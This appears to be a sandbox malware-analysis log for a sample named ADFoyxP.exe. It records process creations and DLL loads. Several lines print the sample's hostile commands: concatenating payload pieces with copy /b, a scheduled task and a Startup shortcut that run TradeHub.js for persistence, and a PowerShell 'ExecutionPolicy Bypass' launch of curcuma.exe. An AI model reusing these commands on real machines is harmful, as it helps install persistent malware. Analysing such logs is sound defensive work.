Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com m
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Process created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\curcuma.exe "C:\Users\user\AppData\Local\Temp\curcuma.exe"
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2184,i,15394741629772577023,2250770724390570129,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2204 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,7206107532581912577,15538010115052324354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,6174276244726584004,9219914870614864987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2440 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,6174276244726584004,9219914870614864987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 /prefetch:8
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\ADFoyxP.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\expand.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\expand.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\choice.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: version.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: devenum.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: mmdevapi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeSection loaded: ncrypt.dll
